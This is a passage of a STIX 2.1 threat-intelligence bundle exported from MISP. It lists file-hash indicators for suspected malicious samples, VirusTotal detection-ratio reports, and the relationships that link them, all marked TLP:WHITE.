"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:09.000Z", "modified": "2018-09-19T05:21:09.000Z", "pattern": "[file:hashes.MD5 = '9d080aa27da74e146a45b56c86476f20' AND file:hashes.SHA1 = '115bda02fd2807bd0e9645656c378bf1b145b4b8' AND file:hashes.SHA256 = 'dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:09Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:08.000Z", "modified": "2018-09-19T05:21:08.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T11:41:09", "category": "Other", "uuid": "3d949d3f-cbed-49eb-b6d4-76efa21d3605" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff/analysis/1537270869/", "category": "External analysis", "uuid": "120a5e8e-d241-45d1-a52a-b20a69c69c21" }, { "type": "text", "object_relation": "detection-ratio", "value": "21/58", "category": "Other", "uuid": "6522271c-6206-43b8-bed9-2ee6b928da31" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:12.000Z", "modified": "2018-09-19T05:21:12.000Z", "pattern": "[file:hashes.MD5 = '2d39b1792b263eba084e10c54e053d84' AND file:hashes.SHA1 = '1468eac59bd43901de82389276bded18202f799f' AND file:hashes.SHA256 = 'f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:12Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:10.000Z", "modified": "2018-09-19T05:21:10.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T18:34:30", "category": "Other", "uuid": "9c2f0268-084d-401f-a118-859baa7da926" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc/analysis/1537295670/", "category": "External analysis", "uuid": "92b34d76-149f-4fab-a1c0-3d1fab052d39" }, { "type": "text", "object_relation": "detection-ratio", "value": "15/58", "category": "Other", "uuid": "7c1e81fd-a762-4c8c-910f-e10d7da374bd" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--93747f03-1eec-47e4-82bc-29b8356a4961", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:14.000Z", "modified": "2018-09-19T05:21:14.000Z", "pattern": "[file:hashes.MD5 = '7b5008d312465307905d96b4b8366326' AND file:hashes.SHA1 = 'a0a5d9fc4ce11f9069a64229cef52ba707027546' AND file:hashes.SHA256 = '0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:12.000Z", "modified": "2018-09-19T05:21:12.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T05:11:59", "category": "Other", "uuid": "344f34ab-206c-4ca6-857f-f038049eeca8" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641/analysis/1537333919/", "category": "External analysis", "uuid": "b42f45b5-2c58-4b38-a615-c6c66fd48dcb" }, { "type": "text", "object_relation": "detection-ratio", "value": "10/58", "category": "Other", "uuid": "647a2027-5c6b-4ee2-a934-fe17edc10ae7" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:16.000Z", "modified": "2018-09-19T05:21:16.000Z", "pattern": "[file:hashes.MD5 = 'e158c98a90cc7b14d026443cbcd8b520' AND file:hashes.SHA1 = '0c00df2bee83f9f7c6f2be3d9dd7557e9410a579' AND file:hashes.SHA256 = 'a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:16Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:15.000Z", "modified": "2018-09-19T05:21:15.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T18:31:13", "category": "Other", "uuid": "3eecf2ce-db49-433d-8296-a664cf52841e" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af/analysis/1537295473/", "category": "External analysis", "uuid": "5e7593ee-fbb7-411a-8578-ed90875953e3" }, { "type": "text", "object_relation": "detection-ratio", "value": "14/58", "category": "Other", "uuid": "585e2605-9a59-4405-b604-1d36a87903e8" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--45a9a837-c3c8-436c-a546-30547955ba2c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:19.000Z", "modified": "2018-09-19T05:21:19.000Z", "pattern": "[file:hashes.MD5 = '3b5baecd61190e12a526c51d5ecccbbe' AND file:hashes.SHA1 = '422288eb6941cee899c1046ccfcd94681b36230a' AND file:hashes.SHA256 = 'f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:19Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:17.000Z", "modified": "2018-09-19T05:21:17.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:11", "category": "Other", "uuid": "f817657f-fa64-46b2-83d0-5baddd55e755" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8/analysis/1537327871/", "category": "External analysis", "uuid": "8e6ad2e0-623d-4a80-a8d1-9fd46979f486" }, { "type": "text", "object_relation": "detection-ratio", "value": "10/58", "category": "Other", "uuid": "1605e2ae-c2cb-4ec7-83b8-eae5be80768c" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:21.000Z", "modified": "2018-09-19T05:21:21.000Z", "pattern": "[file:hashes.MD5 = '50ab7c696ca74e8ae322855d445e0613' AND file:hashes.SHA1 = 'b8b0226fb4f945b68d222c62ebb02f00874f379c' AND file:hashes.SHA256 = 'de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:21Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:19.000Z", "modified": "2018-09-19T05:21:19.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T10:58:17", "category": "Other", "uuid": "9229de7c-a78d-4c5e-9a03-a80669988b10" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d/analysis/1537268297/", "category": "External analysis", "uuid": "69b5bea2-6731-4815-a928-fee550c759e4" }, { "type": "text", "object_relation": "detection-ratio", "value": "20/58", "category": "Other", "uuid": "e36c477b-83aa-479a-ab23-212692965f2e" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:23.000Z", "modified": "2018-09-19T05:21:23.000Z", "pattern": "[file:hashes.MD5 = '56303f9c9b3ec89f4a883a4d7b079f65' AND file:hashes.SHA1 = '4f0d4dc8cf49e2deff34e00e362bbc81dbef1f8d' AND file:hashes.SHA256 = '7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:23Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:22.000Z", "modified": "2018-09-19T05:21:22.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T05:10:00", "category": "Other", "uuid": "e412a478-b0ac-46aa-af48-a19eb9484d6e" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa/analysis/1537333800/", "category": "External analysis", "uuid": "7149939a-1c5a-4b67-8ae0-edd23d9c4473" }, { "type": "text", "object_relation": "detection-ratio", "value": "12/58", "category": "Other", "uuid": "c5156a8e-63da-4dca-af17-fe34c7991169" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:25.000Z", "modified": "2018-09-19T05:21:25.000Z", "pattern": "[file:hashes.MD5 = '55142f1d393c5ba7405239f232a6c059' AND file:hashes.SHA1 = 'effa37b97174802f17f3c75f25928226b7cd80ba' AND file:hashes.SHA256 = 'e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:25Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:24.000Z", "modified": "2018-09-19T05:21:24.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T18:37:52", "category": "Other", "uuid": "d289e539-f5be-4002-9ae9-d3bf3a0c4b6c" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c/analysis/1537295872/", "category": "External analysis", "uuid": "9f4ff50c-787c-4ffe-bde1-c802d2f1a658" }, { "type": "text", "object_relation": "detection-ratio", "value": "11/58", "category": "Other", "uuid": "433d9d46-b96e-4c76-9134-de36185263bb" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:28.000Z", "modified": "2018-09-19T05:21:28.000Z", "pattern": "[file:hashes.MD5 = '601080e36cd6a757684e0996afd9a0e6' AND file:hashes.SHA1 = 'e818a9a229d93e6bfe0285c8a155dcaceb03b03d' AND file:hashes.SHA256 = 'd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:28Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:26.000Z", "modified": "2018-09-19T05:21:26.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:25", "category": "Other", "uuid": "f49f7c54-6abf-441e-af78-252779b3999b" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6/analysis/1537327885/", "category": "External analysis", "uuid": "4fdb1fd9-d5e9-4521-818f-912d41c677bd" }, { "type": "text", "object_relation": "detection-ratio", "value": "2/58", "category": "Other", "uuid": "e8a2ade3-e01e-4b65-ad3c-87d11345213f" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:30.000Z", "modified": "2018-09-19T05:21:30.000Z", "pattern": "[file:hashes.MD5 = '3a3ae909caee915af927c29a6025d16c' AND file:hashes.SHA1 = '81e7207f502229769d2d7979f88235261053c24b' AND file:hashes.SHA256 = '31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:30Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:29.000Z", "modified": "2018-09-19T05:21:29.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:19", "category": "Other", "uuid": "9707f2d5-8180-48c6-80e2-025cf0854494" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78/analysis/1537327879/", "category": "External analysis", "uuid": "a826a3c1-863e-4783-a3d7-6681f99f56c4" }, { "type": "text", "object_relation": "detection-ratio", "value": "42/67", "category": "Other", "uuid": "13fdd406-d4b9-4915-b544-d01eafb9c379" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:33.000Z", "modified": "2018-09-19T05:21:33.000Z", "pattern": "[file:hashes.MD5 = '1ef7d145bf7153292ea33fe7c900ece9' AND file:hashes.SHA1 = '8f0323e577d4df82c7faa4cd6ba7303b38b6a26e' AND file:hashes.SHA256 = 'ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:33Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:31.000Z", "modified": "2018-09-19T05:21:31.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:28", "category": "Other", "uuid": "2a60357e-ee2f-464b-94fe-aaecf41cc0dd" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50/analysis/1537327888/", "category": "External analysis", "uuid": "7a27e755-1f59-493b-9614-e9179f2be1e6" }, { "type": "text", "object_relation": "detection-ratio", "value": "38/66", "category": "Other", "uuid": "eb43528e-3ebb-45ba-a024-ab76913aa644" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "pattern": "[file:hashes.MD5 = 'a6484c6e007b1277164dd49115e5e271' AND file:hashes.SHA1 = '0308aaea4d969bc7fe4391e86b14c4908ab6adbe' AND file:hashes.SHA256 = '09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:35Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:33.000Z", "modified": "2018-09-19T05:21:33.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T12:02:50", "category": "Other", "uuid": "2b1a7a8f-99fc-4684-98e7-f38d718555a8" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885/analysis/1537272170/", "category": "External analysis", "uuid": "7d67a45d-37b8-4972-93be-68eb79124851" }, { "type": "text", "object_relation": "detection-ratio", "value": "20/58", "category": "Other", "uuid": "f916ec81-9212-4dc6-bef9-dc7982bd15a3" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--62c44254-dfdd-46a5-8405-b822bd1e8729", "created": "2018-09-19T05:21:34.000Z", "modified": "2018-09-19T05:21:34.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "target_ref": "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9d3348b4-1d0b-4747-a234-795e33e1f48d", "created": "2018-09-19T05:21:34.000Z", "modified": "2018-09-19T05:21:34.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "target_ref": "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3a5866c4-e62f-456c-822c-e656cef75d59", "created": "2018-09-19T05:21:34.000Z", "modified": "2018-09-19T05:21:34.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--edd4b990-82be-4e5e-858f-50bbd7222f03", "target_ref": "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2bb4017d-0fb8-43bb-ad98-dcb648150f8e", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--33e723b8-2142-46a4-8eae-c311211ea8a0", "target_ref": "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--97dce8d6-48a2-4712-bd1a-378edec44abe", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9", "target_ref": "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--dee4280e-6cd1-49c5-ac6b-ac955a20ac7f", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--93747f03-1eec-47e4-82bc-29b8356a4961", "target_ref": "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9d97e294-b4a5-4bdf-8a6d-4776f616c0fc", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07", "target_ref": "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6ca72a98-d5a6-4f61-a834-e223a1ec6196", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--45a9a837-c3c8-436c-a546-30547955ba2c", "target_ref": "x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9c8ea731-f63c-430e-a0bc-8211fdd56f51", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a", "target_ref": "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9a77cf06-e5bc-4fa3-b678-1dd099ee5926", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c", "target_ref": "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d20dc510-00b2-4562-862d-af956e2cd62b", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba", "target_ref": "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2dd0a986-b772-4b30-b878-9e1e211e7482", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096", "target_ref": "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9cf5bd76-c761-4c60-91e8-15d6ff2b8574", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa", "target_ref": "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6dab5053-03e3-46d0-88a7-7d3e26d63c5a", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e", "target_ref": "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7c1e196f-cc4d-4015-b169-1633c85a3da6", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "target_ref": "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a" }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }